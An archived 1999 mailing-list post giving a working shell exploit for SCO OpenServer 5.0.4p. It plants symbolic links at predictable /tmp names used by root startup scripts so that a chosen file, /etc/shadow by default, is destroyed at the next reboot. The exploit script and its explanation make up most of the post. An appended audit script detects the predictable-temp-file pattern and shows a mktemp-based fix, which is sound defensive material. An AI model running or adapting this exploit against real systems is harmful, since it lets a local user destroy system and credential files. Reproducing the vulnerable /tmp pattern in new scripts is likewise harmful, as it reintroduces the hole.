Little exploit for startup scripts (SCO 5.0.4p).

From: leshka (leshkaat_private)
Date: Sun Mar 07 1999 - 04:07:23 PST


    #!/bin/sh
    #
    #                                   ... The punishment for inobedience ...
    #                                                   (Cycle # 2)
    #
    #                This simple script can help to erase any file
    #                 (SCO OpenServer Enterprise System v 5.0.4p).
    #                                 Have fun !
    #
    #
    #
    #
    # Some of the "/etc/rc2.d" startup scripts create and then delete temporary
    # files with easily predictable names in the "/tmp" directory. Below are a
    # few interesting fragments of those nice scripts:
    #
    # S84rpcinit:
    # ...
    #       /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
    #       /bin/rm -f /tmp/rpc.err$$
    # ...
    #       rm -rf /tmp/rpc$$
    #
    # S95nis:
    # ...
    #       /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
    #       /bin/rm -f /tmp/nis.err$$
    # ...
    #       rm -f /tmp/nis$$
    #
    # S85tcp:
    # ...
    #       /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
    #       /bin/rm -f /tmp/ps.err$$
    # ...
    #       /bin/rm -f /tmp/tps$$
    #
    # S89nfs:
    # ...
    #       /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
    #       /bin/rm -f /tmp/nfs.err$$
    # ...
    #       rm -f /tmp/nfs$$
    #
    # Every time during the startup, such shell scripts create files with names
    # that include the process number of the above shell script. My numerous
    # tests showed that the number is always the same with every reboot. Pretty
    # good, isn't it? One problem: how to determine the process number of such a
    # script? It's so simple! Child processes of this script have PIDs with
    # values slightly higher than the parent's PID. A little math and one gets
    # it. The next step is creating a few symbolic links to the victim file in
    # the "/tmp" directory. During the next startup the victim file will be
    # destroyed.
    #
    # P.S. Looking forward to seeing a complete list of the names of such
    # perfect SCO shell scripts published.
    #
    #                                   999,99*2
    #
    #                            ----------------------
    #                ---------------------------------------------
    #     -----------------   Dedicated to my beautiful lady   ------------------
    #                ---------------------------------------------
    #                            ----------------------
    #
    #       Leshka Zakharoff, 1999. E-mail: leshkaat_private (.ru)
    #
    #
    #
    if [ _$1 = "_" ]
    then
        {
         echo -n "File to delete [/etc/shadow]:"
         read victim_file
         if [ _$victim_file = "_" ]
            then
                victim_file="/etc/shadow"
            fi
        }
    else
        victim_file=$1
    fi
    # PID of inetd, started by the same rc scripts; the temp-file PIDs sit just
    # below it. "grep -v awk" drops the awk process itself from the ps listing.
    pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`
    lastpid=`expr $pid - 30`
    # Plant a link for each candidate PID so the startup script's redirection
    # and "rm" act on the chosen file rather than on /tmp/tps<pid>.
    while [ $pid != $lastpid ]
          do
            pid=`expr $pid - 1`;ln -fs "$victim_file" /tmp/tps$pid
          done
    echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
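
    The weakness the post describes is a startup script redirecting output into
    /tmp under a name built only from $$: any local user can pre-create that name
    or replace it with a symbolic link, and the root-owned script then writes to
    or removes whatever the link points to. The following script is an added
    example, not part of the original post or of SCO's rc scripts. It audits a
    directory of startup scripts for that pattern and shows the hardened
    alternative (a private mktemp(1) directory). The function names
    find_predictable_tmp, count_predictable_tmp, safe_snapshot and make_samples
    are hypothetical, and the sample scripts make_samples writes are constructed
    from the fragments quoted above.

```shell
#!/bin/sh
# Audit startup scripts for temp files created under predictable names and
# show the safe replacement.  Added example; helper names are hypothetical.

# Print "file:line:text" for every line that redirects into a file under
# /tmp, /var/tmp or /usr/tmp whose name embeds the script's PID ($$).
find_predictable_tmp() {
    dir=$1
    grep -n -E '>[[:space:]]*/(var/|usr/)?tmp/[^[:space:]]*\$\$' "$dir"/* 2>/dev/null
}

# Number of findings, so a test or a periodic job can act on the count.
count_predictable_tmp() {
    find_predictable_tmp "$1" | wc -l | tr -d ' '
}

# Hardened replacement for the pattern seen in the rc scripts: run a command
# with its output and errors inside a private directory made by mktemp -d
# (owned by the caller, mode 0700), so nobody else can plant a file or link
# there, then copy the result out.  Usage: safe_snapshot /path/out ps -ef
safe_snapshot() {
    outfile=$1; shift
    tmpd=$(mktemp -d) || return 1
    "$@" > "$tmpd/out" 2> "$tmpd/err"
    status=$?
    cp "$tmpd/out" "$outfile"
    rm -rf "$tmpd"
    return $status
}

# Write two constructed sample scripts into a scratch directory: one that
# reproduces the vulnerable S84rpcinit fragment, one that uses mktemp.
# Prints the directory path.
make_samples() {
    sdir=$(mktemp -d) || return 1
    cat > "$sdir/S84rpcinit" <<'EOF'
#!/bin/sh
/bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
/bin/rm -f /tmp/rpc.err$$
rm -rf /tmp/rpc$$
EOF
    cat > "$sdir/S99safe" <<'EOF'
#!/bin/sh
T=$(mktemp -d) || exit 1
ps -ef > "$T/ps.out"
rm -rf "$T"
EOF
    echo "$sdir"
}
```

    Run as "find_predictable_tmp /etc/rc2.d" (or any init directory) after
    sourcing the file; only the S84rpcinit-style line is reported, because the
    mktemp-based script never names a /tmp path directly. The audit is a plain
    grep and will miss temp names built in other ways, so treat a clean run as a
    starting point rather than proof.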
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:10 PDT